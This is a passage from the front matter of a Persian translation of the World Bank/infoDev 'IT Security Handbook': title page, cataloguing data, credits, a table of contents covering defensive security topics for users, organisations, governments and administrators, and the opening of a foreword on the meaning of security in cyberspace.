ﺭﺍﻫﻨﻤﺎﻱ
ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺗﺄﻟﻴﻒ:
ﺟﻮﺭﺝ ﺳﺎﺩﻭﺳـﻜﺎﻱ
ﺟﻴﻤﺰ ﺍﻛﺲ .ﺩﻣﭙﺰﻱ
ﺁﻟـﻦ ﮔﺮﻳﻦﺑﺮﮒ
ﺑﺎﺭﺑﺎﺭﺍ ﺟﻲ .ﻣﻚ
ﺁﻟـﻦ ﺷﻮﺍﺭﺗﺰ
ﺗﺮﺟﻤﺔ:
ﻣﻬﺪﻱ ﻣﻴﺮﺩﺍﻣـﺎﺩﻱ
ﺯﻫــﺮﺍ ﺷﺠــﺎﻋﻲ
ﻣﺤﻤﺪﺟﻮﺍﺩ ﺻﻤﺪﻱ
ﺩﺑﻴﺮﺧﺎﻧﻪ
ﺷﻮﺭﺍﻱﻋﺎﻟﻲ ﺍﻃﻼﻉﺭﺳﺎﻧﻲ
ﺗﻴﺮﻣﺎﻩ ۱۳۸۴
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ = / IT Security Handbookﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﺟﻮﺭﺝ ﺳﺎﺩﻭﺳﮑﺎﻱ ] ...ﻭ ﺩﻳﮕﺮﺍﻥ[؛ ﮔﺮﻭﻩ ﻣﺘﺮﺟﻤﻴﻦ ﻣﻬﺪﻱ
ﻣﻴﺮﺩﺍﻣﺎﺩﻱ ،ﺯﻫﺮﺍ ﺷﺠﺎﻋﻲ ،ﻣﺤﻤﺪﺟﻮﺍﺩ ﺻﻤﺪﻱ -- .ﺗﻬﺮﺍﻥ ،ﺷﻮﺭﺍﻱ ﻋﺎﻟﻲ ﺍﻃﻼﻉﺭﺳﺎﻧﻲ ،ﺩﺑﻴﺮﺧﺎﻧﻪ.۱۳۸۴ ،
۵۰۹ﺹ:.ﺟﺪﻭﻝ ۵۰،۰۰۰ .ﺭﻳﺎﻝ
ISBN: 964-8846-26-x
ﻋﻨﻮﺍﻥ ﺑﻪ ﺍﻧﮕﻠﻴﺴﻲ:
IT Security Handbook
ﻓﻬﺮﺳﺘﻨﻮﻳﺴﻲ ﺑﺮ ﺍﺳﺎﺱ ﺍﻃﻼﻋﺎﺕ ﻓﻴﭙﺎ.
ﮐﺘﺎﺑﻨﺎﻣﻪ :ﺹ۵۰۹ .؛ ﻫﻤﭽﻨﻴﻦ ﺑﻪ ﺻﻮﺭﺕ ﺯﻳﺮﻧﻮﻳﺲ .ﻧﻤﺎﻳﻪ.
.۱ﺗﮑﻨﻮﻟﻮﮊﻱ ﺍﻃﻼﻋﺎﺕ --ﺍﻗﺪﺍﻣﺎﺕ ﺗﺄﻣﻴﻨﻲ .ﺍﻟﻒ .ﺳﺎﺩﻭﺳﮑﺎﻱ ،ﺟﻮﺭﺝ .Sadowsky ،George ،ﺏ.ﻣﻴﺮﺩﺍﻣﺎﺩﻱ ،ﻣﻬﺪﻱ ،- - ۱۳۵۹ -ﻣﺘﺮﺟﻢ.
ﺝ.ﺷﺠﺎﻋﻲ ،ﺯﻫﺮﺍ ،ﻣﺘﺮﺟﻢ .ﺩ.ﺻﻤﺪﻱ ،ﻣﺤﻤﺪﺟﻮﺍﺩ ،ﻣﺘﺮﺟﻢ .ﻫـ .ﺷﻮﺭﺍﻱ ﻋﺎﻟﻲ ﺍﻃﻼﻉﺭﺳﺎﻧﻲ .ﺩﺑﻴﺮﺧﺎﻧﻪ .ﻭ.ﻋﻨﻮﺍﻥ.
۲۳ﺭT۵۸/۵/
۱۳۸۴
ﮐﺘﺎﺑﺨﺎﻧﻪ ﻣﻠﻲ ﺍﻳﺮﺍﻥ
۳۰۳/۴۸۳۳
۸۴-۱۷۵۲۵ﻡ
ﺍﻳﻦ ﮐﺘﺎﺏ ﺗﺮﺟﻤﻪﺍﻱ ﺍﺳﺖ ﺍﺯ:
;George Sadowsky; James X. Dempsey; Alan Greenberg; Barbara J. Mack
Alan Schwartz; IT Security Handbook; infoDev, Worldbank; 2003.
)(ISBN: 964-03-9951-5; http://www.infodev-security.net/handbook
ﺭﺍﻫﻨﻤـﺎﻱ ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ
© ﺣﻖ ﭼﺎﭖ ۱۳۸۳ :ﺩﺑﻴﺮﺧﺎﻧﺔ ﺷﻮﺭﺍﻱﻋﺎﻟﻲ ﺍﻃﻼﻉﺭﺳﺎﻧﻲ
ﻣﺆﻟﻔﻴﻦ :ﺟﻮﺭﺝ ﺳﺎﺩﻭﺳﮑﺎﻱ ،ﺟﻴﻤﺰ ﺍﮐﺲ .ﺩﻣﭙﺰﻱ ،ﺁﻟﻦ ﮔﺮﻳﻦﺑﺮﮒ ،ﺑﺎﺭﺑﺎﺭﺍ ﺟﻲ .ﻣﮏ ،ﺁﻟﻦ ﺷﻮﺍﺭﺗﺰ
ﮔـﺮﻭﻩ ﻣﺘﺮﺟﻤﻴﻦ :ﻣﻬﺪﻱ ﻣﻴﺮﺩﺍﻣـﺎﺩﻱ )(mirmahdi@ashnasecure.com
ﺯﻫــﺮﺍ ﺷﺠــﺎﻋـﻲ )(z.shojaee@ashnasecure.com
ﻣﺤﻤﺪﺟﻮﺍﺩ ﺻﻤﺪﻱ )(m.samadi@ashnasecure.com
ﻭﻳـﺮﺍﻳﺶ ﻓﻨـﻲ :ﻣﻬﺪﻱ ﻣﻴﺮﺩﺍﻣـﺎﺩﻱ
ﺻﻔﺤـﻪﺁﺭﺍﻳﻲ ﻭ ﻧﺴﺨـﻪﭘﺮﺩﺍﺯﻱ :ﻣـﺎﺭﻳـــﺎ ﻗــﺎﺩﺭﻱ )(maria_ghaderi@yahoo.com
ﻟﻴﺘﻮﮔﺮﺍﻓﻲ ،ﭼﺎﭖ ﻭ ﺻﺤﺎﻓﻲ :ﺷﺮﮐﺖ ﺍﻧﺘﺸﺎﺭﺍﺕ ﮔﻞﻭﺍﮊﻩ
ﻧﺎﻇﺮ ﭼﺎﭖ :ﺳﻌﻴﺪ ﺯﺭﺍﻋﺘﻲ )(ss_zeraati@yahoo.com
ﻧﻮﺑﺖ ﭼﺎﭖ :ﺍﻭﻝ ۱۳۸۴
ﺷﻤـﺎﺭﮔﺎﻥ ۱۵۰۰ :ﻧﺴﺨﻪ
ﺷــﺎﺑـﮏISBN: 964-8846-26-x / ۹۶۴-۸۸۴۶-۲۶-x :
ﺷﻤﺎﺭﺓ ﭘﻴﺎﭘﻲ ﺍﻧﺘﺸﺎﺭﺍﺕ ﺩﺑﻴﺮﺧﺎﻧﻪ۸۴-۱۴ :
ﻗـﻴـﻤـﺖ ۵۰،۰۰۰ :ﺭﻳﺎﻝ
ﻧﺸﺎﻧﻲ ﭘﺴﺘﻲ :ﺗﻬﺮﺍﻥ ،ﺧﻴﺎﺑﺎﻥ ﺷﺮﻳﻌﺘﻲ ،ﻧﺮﺳﻴﺪﻩ ﺑﻪ ﭼﻬﺎﺭﺭﺍﻩ ﺷﻬﻴﺪ ﻗﺪﻭﺳﻲ ،ﻧﺒﺶ ﺍﻧﺪﻳﺸﻪ ﻳﻜﻢ ،ﺷﻤﺎﺭﺓ ۸۰۸
ﺗﻠﻔﻦ ۸۸۴۴۸۰۳۷ :ﻭ ۸۸۴۴۸۰۳۸ﻧﻤﺎﺑﺮ ، ۸۸۴۴۸۰۳۸ :ﺹ.ﭖ۱۳۱۵ :ـ ۱۶۳۱۵
ﻧﺸﺎﻧﻲ ﻭﺑﮕﺎﻩhttp://www.scict.ir :
ﻓﻬﺮﺳﺖ
ﭘﻴﺶﮔﻔﺘﺎﺭ ..............................................................................................................................................................................
ﻳﺎﺩﺩﺍﺷﺖ ﻣﺘﺮﺟﻤﻴﻦ ..............................................................................................................................................................
ﺩﻳﺒﺎﭼﻪ ....................................................................................................................................................................................
ﭘﻴﺶ ﺩﺭﺁﻣﺪ ...........................................................................................................................................................................
ﺧﻼﺻﺔ ﺍﺟﺮﺍﻳﻲ .....................................................................................................................................................................
۷
۹
۱۱
۱۳
۱۹
ﺑﺨﺶ ﺍﻭﻝ .ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ ۲۵ .............................................................................................
ﺑﺨﺶ ﺩﻭﻡ .ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ ..............................................................................................
ﻓﺼﻞ .۱ﻣﻘﺪﻣﻪ ......................................................................................................................................................
ﻓﺼﻞ .۲ﺩﺭﮎ ﻣﻔﺎﻫﻴﻢ ﺍﻣﻨﻴﺘﻲ ................................................................................................................................
ﻓﺼﻞ .۳ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﻭ ﺩﺍﺩﻩﻫﺎ ..............................................................................................................................
ﻓﺼﻞ .۴ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ...........................................................................................
ﻓﺼﻞ .۵ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ ................................................................................................................................
ﻓﺼﻞ .۶ﺍﻣﻨﻴﺖ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪ ...............................................................................................................................
ﻓﺼﻞ .۷ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ ..................................................................................................................
ﻓﺼﻞ .۸ﻧﻜﺎﺕ ﻭﻳﮋﺓ ﺑﺴﺘﺮﻫﺎﻱ ﻣﺨﺘﻠﻒ ..................................................................................................................
ﺿﻤﻴﻤﺔ .۱ﺁﺷﻨﺎﻳﻲ ﺑﺎ ﻛﺪﮔﺬﺍﺭﻱ ﻭ ﺭﻣﺰﮔﺬﺍﺭﻱ .............................................................................................................
ﺿﻤﻴﻤﺔ ................................................................................................................................................. TCP/IP .۲
ﺿﻤﻴﻤﺔ .۳ﻭﺍﮊﻩﻧﺎﻣﺔ ﺍﺻﻄﻼﺣﺎﺕ ﻓﻨﻲ ........................................................................................................................
۴۵
۴۷
۴۹
۵۵
۶۵
۷۱
۷۹
۹۳
۹۹
۱۰۵
۱۱۱
۱۱۵
ﺑﺨﺶ ﺳﻮﻡ .ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ ......................................................................................................
ﻓﺼﻞ .۱ﻣﻘﺪﻣﻪ ......................................................................................................................................................
ﻓﺼﻞ .۲ﻣﺮﻭﺭﻱ ﺑﺮ ﺭﻭﺷﻬﺎﻱ ﻛﺎﻫﺶ ﺁﺛﺎﺭ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ .................................................................
ﻓﺼﻞ .۳ﺑﺮﺁﻭﺭﺩ ﻣﺨﺎﻃﺮﻩ ﻭ ﺗﺤﻠﻴﻞ ﺯﻳﺎﻥ .................................................................................................................
ﻓﺼﻞ .۴ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺑﺮﺍﻱ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ............................................................................................................
ﻓﺼﻞ .۵ﭘﻴﺸﮕﻴﺮﻱ ﻭ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺖ ﺳﺎﺯﻣﺎﻧﻲ .......................................................................................................
ﻓﺼﻞ .۶ﺍﻣﻨﻴﺖ ﻛﺎﺭﻛﻨﺎﻥ ........................................................................................................................................
ﻓﺼﻞ .۷ﺑﺮﻭﻧﺴﭙﺎﺭﻱ ﺍﻣﻨﻴﺖ ....................................................................................................................................
ﻓﺼﻞ .۸ﻗﺎﻧﻮﻥﻧﻮﻳﺴﻲ ،ﺗﺪﻭﻳﻦ ﺁﺋﻴﻦﻧﺎﻣﻪﻫﺎﻱ ﺩﻭﻟﺘﻲ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ...................................................
ﻓﺼﻞ .۹ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ........................................................................................................................................
ﻓﺼﻞ .۱۰ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﺍﺕ ﺳﻴﺎﺭ :ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﻣﺤﻴﻂ ﺑﻲﺳﻴﻢ .....................................................
ﻓﺼﻞ .۱۱ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ :ﺍﻳﺠﺎﺩ ﻓﺮﻫﻨﮓ ﺍﻣﻨﻴﺖ .................................................................................................
ﻓﺼﻞ .۱۲ﻗﻮﺍﻋﺪ ﺍﻳﻤﻨﻲ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺮﺍﻱ ﻫﻤﺔ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺷﺮﻛﺘﻬﺎ ...............................................................
ﻓﺼﻞ .۱۳ﮔﻔﺘﮕﻮﻫﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﭘﻴﺮﺍﻣﻮﻥ ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺖ .........................................................................................
۱۱۹
۱۲۱
۱۲۷
۱۳۷
۱۴۵
۱۴۹
۱۵۹
۱۶۷
۱۷۵
۱۷۹
۱۸۵
۱۹۷
۲۰۵
۲۱۵
ﺑﺨﺶ ﭼﻬﺎﺭﻡ .ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ ..................................................................................
ﻓﺼﻞ .۱ﻣﻘﺪﻣﻪ ......................................................................................................................................................
ﻓﺼﻞ .۲ﺣﻔﺎﻇﺖ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻭﻟﺘﻲ ..................................................................................................................
ﻓﺼﻞ .۳ﻧﻘﺶ ﻗﺎﻧﻮﻥ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺖ ﺑﺮ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ................................................................................
ﻓﺼﻞ .۴ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺩﻭﻟﺖ .................................................................................................................
۲۲۹
۲۳۱
۲۳۵
۲۴۳
۲۴۵
ﺑﺨﺶ ﭘﻨﺠﻢ .ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ ...............................................................................................
ﻓﺼﻞ .۱ﻣﻘﺪﻣﻪ ......................................................................................................................................................
ﻓﺼﻞ .۲ﺍﻣﻨﻴﺖ ﺑﺮﺍﻱ ﺭﺍﻫﺒﺮﺍﻥ ................................................................................................................................
ﻓﺼﻞ .۳ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ .........................................................................................................................................
ﻓﺼﻞ .۴ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ .......................................................................................................................................
ﻓﺼﻞ .۵ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ .......................................................................................................................
ﻓﺼﻞ .۶ﺍﻣﻨﻴﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ...............................................................................................................................
ﻓﺼﻞ .۷ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ ............................................................................................................................................
ﻓﺼﻞ .۸ﺍﻧﻮﺍﻉ ﺣﻤﻼﺕ ﻭ ﺭﻭﺷﻬﺎﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺁﻧﻬﺎ .....................................................................................................
ﻓﺼﻞ .۹ﻛﺸﻒ ﻭ ﻣﺪﻳﺮﻳﺖ ﻧﻔﻮﺫ ..............................................................................................................................
ﻓﺼﻞ .۱۰ﻧﻜﺎﺕ ﻭﻳﮋﺓ ﺑﺴﺘﺮﻫﺎﻱ ﻣﺨﺘﻠﻒ ..................................................................................................................
۲۵۵
۲۵۷
۲۶۵
۲۷۹
۲۹۱
۳۱۳
۳۴۷
۳۷۷
۴۰۹
۴۲۳
۴۴۱
ﺑﺨﺶ ﺷﺸﻢ .ﭘﻴﻮﺳﺘﻬﺎ ........................................................................................................................................................
ﭘﻴﻮﺳﺖ .۱ﻭﺍﮊﻩﻧﺎﻣﻪ ﺍﺻﻄﻼﺣﺎﺕ ................................................................................................................................
ﭘﻴﻮﺳﺖ .۲ﻛﺘﺎﺑﻨﺎﻣﻪ ...................................................................................................................................................
ﭘﻴﻮﺳﺖ .۳ﻣﻨﺎﺑﻊ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ .....................................................................................................................................
ﭘﻴﻮﺳﺖ .۴ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ....................................................................................................................................
ﭘﻴﻮﺳﺖ .۵ﻣﻨﺎﺑﻊ ﭼﺎﭘﻲ ..............................................................................................................................................
۴۵۳
۴۵۵
۴۶۷
۴۷۹
۴۸۹
۴۹۵
ﻟﻐﺎﺕ ﻭ ﺍﺻﻄﻼﺣﺎﺕ ﺭﺍﻳﺞ ﺍﻣﻨﻴﺘﻲ ۵۰۳ ........................................................................................................................................
ﭘﻴﺶﮔﻔﺘﺎﺭ
ﻼ ﺷﻨﺎﺧﺘﻪﺷﺪﻩ ﺑﺮﺍﻱ ﺑـﺸﺮ ﺑـﻮﺩﻩ ﻭ ﻫـﺴﺖ .ﺩﺭ ﺩﻭﺭﺍﻥ ﻣﺎﻗﺒـﻞ ﺗـﺎﺭﻳﺦ ،ﺍﻣﻨﻴـﺖ
ﻣﻔﻬﻮﻡ ﺍﻣﻨﻴﺖ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﻣﻔﻬﻮﻣﻲ ﺣﻴﺎﺗﻲ ﻭ ﻛﺎﻣ ﹰ
ﻼ ﻓﻴﺰﻳﻜﻲ ﺭﺍ ﺷﺎﻣﻞ ﻣﻲﺷﺪ ﻛﻪ ﻋﺒﺎﺭﺕ ﺑﻮﺩ ﺍﺯ ﺍﺻﻮﻝ ﺣﻔﻆ ﺑﻘﺎ ﻧﻈﻴﺮ ﺍﻣﻨﻴﺖ ﺩﺭ ﺑﺮﺍﺑﺮ ﺣﻤﻠﺔ ﺩﻳﮕﺮﺍﻥ ﻳﺎ ﺣﻴﻮﺍﻧﺎﺕ ﻭ ﻧﻴـﺰ ﺍﻣﻨﻴـﺖ
ﻣﻔﻬﻮﻣﻲ ﻛﺎﻣ ﹰ
ﺗﺄﻣﻴﻦ ﻏﺬﺍ .ﺑﺘﺪﺭﻳﺞ ﻧﻴﺎﺯﻫﺎﻱ ﺩﻳﮕﺮﻱ ﭼﻮﻥ ﺍﻣﻨﻴﺖ ﺩﺭ ﺑﺮﺍﺑﺮ ﺣﻮﺍﺩﺙ ﻃﺒﻴﻌﻲ ﻳﺎ ﺑﻴﻤﺎﺭﻳﻬﺎ ﻭ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻦ ﻣﻜﺎﻧﻲ ﺑﺮﺍﻱ ﺯﻧﺪﮔﻲ ﻭ ﺍﺳﺘﺮﺍﺣﺖ
ﺑﺪﻭﻥ ﻣﻮﺍﺟﻬﻪ ﺑﺎ ﺧﻄﺮ ﺑﻪ ﻧﻴﺎﺯﻫﺎﻱ ﭘﻴﺸﻴﻦ ﺑﺸﺮ ﺍﻓﺰﻭﺩﻩ ﺷﺪ .ﺑﺎ ﭘﻴـﺸﺮﻓﺖ ﺗﻤـﺪﻥ ﻭ ﺷـﻜﻞﮔﻴـﺮﻱ ﺟﻮﺍﻣـﻊ ،ﻣﺤـﺪﻭﺩﺓ ﺍﻣﻨﻴـﺖ ﺍﺑﻌـﺎﺩ ﺑـﺴﻴﺎﺭ
ﮔﺴﺘﺮﺩﻩﺗﺮﻱ ﻳﺎﻓﺖ ﻭ ﺑﺎ ﺗﻔﻜﻴﻚ ﺣﻮﺯﺓ ﺍﻣﻮﺍﻝ ﻭ ﺣﻘﻮﻕ ﺷﺨﺼﻲ ﺍﻓﺮﺍﺩ ﺍﺯ ﻳﻜﺪﻳﮕﺮ ﻭ ﺍﺯ ﺍﻣﻮﺍﻝ ﻋﻤﻮﻣﻲ ،ﻭ ﻫﻤﭽﻨﻴﻦ ﺗﻌﺮﻳﻒ ﻗﻠﻤﺮﻭﻫﺎﻱ ﻣﻠﻲ ﻭ
ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ،ﺑﺘﺪﺭﻳﺞ ﻣﻔﺎﻫﻴﻢ ﻭﺳﻴﻌﻲ ﻣﺎﻧﻨﺪ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ،ﺍﻣﻨﻴﺖ ﺍﺟﺘﻤﺎﻋﻲ ،ﺍﻣﻨﻴﺖ ﻣﺎﻟﻲ ،ﺍﻣﻨﻴﺖ ﺳﻴﺎﺳﻲ ،ﺍﻣﻨﻴﺖ ﻣﻠﻲ ﻭ ﺍﻣﻨﻴﺖ ﺍﻗﺘـﺼﺎﺩﻱ
ﻼ ﻣﺤﺪﻭﺩ ﺑﻪ ﻧﻴﺎﺯﻫﺎﻱ ﻓﻴﺰﻳﻜﻲ ﺑﺸﺮ ﻧﻤﻲﺷﺪﻧﺪ ،ﻭﻟﻲ ﻋﻤﺪﺗﹰﺎ ﺗﺤﻘﻖ ﻭ ﺩﺳـﺘﻴﺎﺑﻲ ﺑـﻪ ﺁﻧﻬـﺎ
ﺭﺍ ﻧﻴﺰ ﺷﺎﻣﻞ ﮔﺮﺩﻳﺪ .ﺍﻳﻦ ﻣﻔﺎﻫﻴﻢ ﮔﺮﭼﻪ ﺩﻳﮕﺮ ﻛﺎﻣ ﹰ
ﻣﺴﺘﻠﺰﻡ ﻭﺟﻮﺩ ﻭ ﻳﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﺤﻴﻂﻫﺎﻱ ﻭﺍﻗﻌﻲ ﻭ ﻓﻴﺰﻳﻜﻲ ﺑﻮﺩ.
ﻟﻴﻜﻦ ﺟﻬﺎﻥ ﺩﺭ ﺩﻫﻪﻫﺎﻱ ﺍﺧﻴﺮ ﻭ ﺑﻮﻳﮋﻩ ﺩﺭ ﭘﻨﺞ ﺳﺎﻝ ﮔﺬﺷﺘﻪ ﻋﺮﺻﺔ ﺗﺤﻮﻻﺕ ﭼﺸﻤﮕﻴﺮﻱ ﺑﻮﺩﻩ ﻛﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻨﺎﺳﺒﺎﺕ ﻭ ﻣﻌـﺎﺩﻻﺕ
ﭘﻴﺸﻴﻦ ﺭﺍ ﺑﻄﻮﺭ ﺍﺳﺎﺳﻲ ﺩﺳﺘﺨﻮﺵ ﺗﻐﻴﻴﺮ ﻧﻤﻮﺩﻩ ﺍﺳﺖ .ﺍﻳﻦ ﺗﺤﻮﻻﺕ ﻛﻪ ﺑﺎ ﻣﺤﻮﺭﻳﺖ ﻛـﺎﺭﺑﺮﻱ ﻭﺳـﻴﻊ ﺍﺯ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ
ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﺷﺪﻩ ،ﺍﺯ ﻛﺎﺭﺑﺮﺩ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﻋﻨﻮﺍﻥ ﺍﺑﺰﺍﺭ ﺧﻮﺩﻛﺎﺭﺳﺎﺯﻱ ) (Automationﻭ ﺍﻓﺰﺍﻳﺶ ﺑﻬﺮﻩﻭﺭﻱ ﺁﻏـﺎﺯ ﮔﺮﺩﻳـﺪﻩ ﻭ ﺍﻛﻨـﻮﻥ ﺑـﺎ ﺗﻜﺎﻣـﻞ
ﻼ ﺯﻧﺪﮔﻲ ﻓﺮﺩﻱ ﻭ ﺍﺟﺘﻤﺎﻋﻲ ﺑﺸﺮ ﺭﺍ ﺩﮔﺮﮔﻮﻥ ﺳﺎﺧﺘﻪ ﺍﺳﺖ .ﺑـﻪ
ﻛﺎﺭﺑﺮﻱ ﺁﻥ ﺩﺭ ﺍﻳﺠﺎﺩ ﻓﻀﺎﻱ ﻫﻢﺍﻓﺰﺍﺋﻲ ﻣﺸﺎﺭﻛﺘﻲ ) ،(Collaborationﻋﻤ ﹰ
ﺑﺎﻭﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺻﺎﺣﺒﻨﻈﺮﺍﻥ ﻫﻤﺎﻧﮕﻮﻧﻪ ﮐﻪ ﭘﻴﺪﺍﻳﺶ ﺧﻂ ﻭ ﮐﺘﺎﺑﺖ ﺁﻧﭽﻨﺎﻥ ﺗﺄﺛﻴﺮ ﺷﮕﺮﻓﻲ ﺑﺮ ﺳﺮﻧﻮﺷﺖ ﺍﻧﺴﺎﻥ ﺑﺮﺟﺎﻱ ﮔﺬﺍﺷﺘﻪ ﮐﻪ ﻣـﻮﺭﺧﻴﻦ
ﺭﺍ ﺑﺮﺁﻥ ﺩﺍﺷﺘﻪ ﺗﺎ ﺩﺍﺳﺘﺎﻥ ﺯﻧﺪﮔﻲ ﺑﺸﺮ ﺑﺮ ﺍﻳﻦ ﮐﺮﻩ ﺧﺎﮐﻲ ﺭﺍ ﺑﻪ ﺩﻭﺭﺍﻥ ﻣﺎ ﻗﺒﻞ ﺗﺎﺭﻳﺦ ﻭ ﺗـﺎﺭﻳﺦ ﺗﻘـﺴﻴﻢ ﻧﻤﺎﻳﻨـﺪ ،ﻭﺭﻭﺩ ﺑـﻪ ﻓـﻀﺎﻱ ﻣﺠـﺎﺯﻱ
ﺣﺎﺻﻞ ﺍﺯ ﻓﻨﺎﻭﺭﻱ ﻧﻮﻳﻦ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻧﻴﺰ ﺩﻭﺭﺓ ﺟﺪﻳﺪﻱ ﺍﺯ ﺗﻤﺪﻥ ﺑﺸﺮﻱ ﺭﺍ ﺭﻗﻢ ﺯﺩﻩ ،ﺑﻨﺤﻮﻱ ﻛﻪ ﺍﻧﻘﻼﺏ ﻋﺼﺮ ﺍﻃﻼﻋـﺎﺕ ﺷـﻴﻮﺓ
ﺍﻧﺪﻳﺸﻪ ،ﺗﻮﻟﻴﺪ ،ﻣﺼﺮﻑ ،ﺗﺠﺎﺭﺕ ،ﻣﺪﻳﺮﻳﺖ ،ﺍﺭﺗﺒﺎﻁ ،ﺟﻨﮓ ﻭ ﺣﺘﻲ ﺩﻳﻨﺪﺍﺭﻱ ﻭ ﻋﺸﻖﻭﺭﺯﻱ ﺭﺍ ﺩﮔﺮﮔﻮﻥ ﺳﺎﺧﺘﻪ ﺍﺳﺖ.
ﺍﻳﻦ ﺗﺤﻮﻝ ﺑﺰﺭﮒ ﺍﻟﺰﺍﻣﺎﺕ ﻭ ﺗﺒﻌﺎﺕ ﻓﺮﺍﻭﺍﻧﻲ ﺭﺍ ﺑﻪ ﻫﻤﺮﺍﻩ ﺩﺍﺷﺘﻪ ﻛﻪ ﺍﺯ ﻣﻬﻤﺘﺮﻳﻦ ﺁﻧﻬﺎ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻥ ﻣﻔﺎﻫﻴﻢ ﻧﻮﻳﻦ ﺍﻣﻨﻴـﺖ ﻣﺠـﺎﺯﻱ ﻳـﺎ
ﺍﻣﻨﻴﺖ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻣﻲﺑﺎﺷﺪ .ﺑﺎ ﺗﻐﻴﻴﺮﻱ ﻛﻪ ﺩﺭ ﺍﻃﻼﻕ ﻋﺒﺎﺭﺕ "ﺷﺒﻜﺔ ﺭﺍﻳﺎﻧـﻪﺍﻱ" ﺍﺯ ﻳـﻚ ﺷـﺒﻜﺔ ﻛﻮﭼـﻚ ﻛـﺎﺭﮔﺮﻭﻫﻲ ﺑـﻪ ﺷـﺒﻜﻪﺍﻱ
ﮔﺴﺘﺮﺩﻩ ﻭ ﺟﻬﺎﻧﻲ )ﺍﻳﻨﺘﺮﻧﺖ( ﻭﺍﻗﻊ ﮔﺮﺩﻳﺪﻩ ،ﻭ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺭﺷﺪ ﺭﻭﺯﺍﻓﺰﻭﻥ ﺗﻌﺎﻣﻼﺕ ﻭ ﺗﺒـﺎﺩﻻﺗﻲ ﻛـﻪ ﺭﻭﻱ ﺷـﺒﻜﻪﻫـﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺻـﻮﺭﺕ
